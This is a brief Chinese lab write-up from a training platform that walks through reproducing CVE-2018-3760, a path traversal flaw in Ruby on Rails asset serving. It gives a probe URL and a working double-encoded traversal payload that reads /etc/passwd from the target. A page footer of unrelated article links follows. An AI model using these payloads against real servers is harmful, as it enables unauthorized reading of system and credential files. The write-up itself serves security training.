墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
Estar.Lee2 分钟前
时间操作[取当前北京时间]免费API接口教程
android·网络·后端·网络协议·tcp/ip
蝶开三月4 分钟前
php:使用socket函数创建WebSocket服务
网络·websocket·网络协议·php·socket
喜欢猪猪4 分钟前
Django:从入门到精通
后端·python·django
一个小坑货4 分钟前
Cargo Rust 的包管理器
开发语言·后端·rust
bluebonnet278 分钟前
【Rust练习】22.HashMap
开发语言·后端·rust
G丶AEOM17 分钟前
SSL/TLS,SSL,TLS分别是什么
网络·网络协议·网络安全
儒道易行21 分钟前
【DVWA】RCE远程命令执行实战
网络·安全·网络安全
uhakadotcom31 分钟前
如何实现一个基于CLI终端的AI 聊天机器人?
后端
Hacker_LaoYi43 分钟前
网络安全与加密
安全·web安全
Iced_Sheep1 小时前
干掉 if else 之策略模式
后端·设计模式